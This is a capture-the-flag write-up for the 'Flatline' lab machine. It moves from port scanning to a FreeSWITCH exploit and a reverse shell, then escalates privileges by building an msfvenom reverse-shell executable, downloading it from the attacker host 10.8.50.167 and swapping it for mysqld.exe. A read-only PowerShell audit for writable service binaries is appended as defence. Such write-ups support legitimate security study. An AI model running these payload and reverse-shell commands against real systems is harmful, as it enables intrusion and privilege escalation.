CTF Flatline

nmap

nmap -sV -p- -Pn -T4 flatline.thm

Port 3389

3389/tcp open ms-wbt-server Microsoft Terminal Services

Certificate


I’m searching on Google but there is nothing interesting.
https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp

Port 8021

8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Google:
https://www.exploit-db.com/exploits/47799

The exploit gives nothing, but it says Authenticated.

So I decided to execute a reverse shell.
https://www.revshells.com/
With the PowerShell #3 (Base64)


First flag

C:\Users\Nekrotic\Desktop

Openclinic

Interesting

https://www.exploit-db.com/exploits/50448

Create the malicious exe file

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.50.167 LPORT=4242 -f exe > mysqld_evil.exe

Download it

Invoke-WebRequest -Uri "http://10.8.50.167:8000/mysqld_evil.exe" -OutFile "mysqld_evil.exe"

Rename it

Rename-Item mysqld.exe mysqld.exe.old
Rename-Item mysqld_evil.exe mysqld.exe

Reboot

Listen first then reboot.
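
The binary swap above works only because a low-privileged account can rename and write files in the folder holding mysqld.exe, and the service starts that file again at boot. As an added example (not part of the original writeup), this PowerShell audit lists services whose executable or its folder is writable by broad groups; the helper name Get-ServiceBinaryPath, the SID list and the rights mask are assumptions chosen for illustration.

```powershell
# Audit: services whose binary, or the folder holding it, can be modified
# by a broad (non-administrative) group. Read-only; changes nothing.

# Assumption: well-known SIDs treated as "low-privileged" for this check.
$broadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

# Only the bits that let someone replace, rename or re-permission a file.
# Read/execute bits are deliberately left out so normal ACLs do not match.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

# Hypothetical helper: pull the executable path out of a service command line.
function Get-ServiceBinaryPath([string]$PathName) {
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }   # quoted path
    if ($PathName -match '^\s*(.+?\.exe)') { return $Matches[1] }  # unquoted path
    return $null
}

foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { continue }

    # Check the file itself and its parent folder: write access to the
    # folder is enough to rename the original and drop a replacement.
    foreach ($target in @($exe, [System.IO.Path]::GetDirectoryName($exe))) {
        $acl = Get-Acl -LiteralPath $target -ErrorAction SilentlyContinue
        if (-not $acl) { continue }

        # Ask for SIDs directly so the check does not depend on localized names.
        $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($ace in $rules) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $sid = $ace.IdentityReference.Value
            if (-not $broadSids.ContainsKey($sid)) { continue }
            if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }

            [pscustomobject]@{
                Service  = $svc.Name
                RunsAs   = $svc.StartName
                Path     = $target
                Identity = $broadSids[$sid]
                Rights   = $ace.FileSystemRights
            }
        }
    }
}
```

Any row where RunsAs is LocalSystem or another privileged account is the condition this box relies on; the fix is to remove the write ACE from the folder and the binary.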